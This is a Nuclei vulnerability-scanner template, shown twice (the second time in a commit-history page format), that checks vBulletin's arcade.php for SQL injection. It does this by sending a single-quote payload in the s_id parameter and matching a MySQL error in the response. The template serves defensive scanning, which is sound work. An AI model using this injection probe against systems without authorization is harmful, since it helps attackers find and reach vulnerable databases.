nuclei-templates/http/vulnerabilities/vbulletin/arcade-php-sqli.yaml

id: arcade-php-sqli

info:
  name: Arcade.php - SQL Injection
  author: MaStErChO
  severity: high
  description: |
    The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.
  reference:
    - https://www.exploit-db.com/exploits/29604
    - https://github.com/OWASP/vbscan/
  metadata:
    max-request: 1
    verified: true
  tags: arcade,php,vbulletin,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "mySQL query error"

      - type: status
        status:
          - 200
reverted back with updates 2023-06-28 11:48:50 +00:00			`id: arcade-php-sqli`

			`info:`
			`name: Arcade.php - SQL Injection`
			`author: MaStErChO`
			`severity: high`
			`description: \|`
			`The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.`
			`reference:`
			`- https://www.exploit-db.com/exploits/29604`
			`- https://github.com/OWASP/vbscan/`
			`metadata:`
			`max-request: 1`
			`verified: true`
			`tags: arcade,php,vbulletin,sqli`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "mySQL query error"`

			`- type: status`
			`status:`
			`- 200`